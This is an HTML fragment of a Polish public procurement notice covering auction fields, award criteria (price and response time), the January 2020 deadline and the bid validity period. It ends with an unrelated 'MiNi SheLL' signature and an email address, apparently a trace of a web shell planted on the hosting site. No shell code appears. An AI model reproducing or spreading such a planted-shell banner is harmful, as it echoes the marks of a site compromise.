id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CZAS REAKCJI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Istotne warunki umowy zostały określone w załączniku nr 5 do SIWZ - wzór umowy</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-01-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com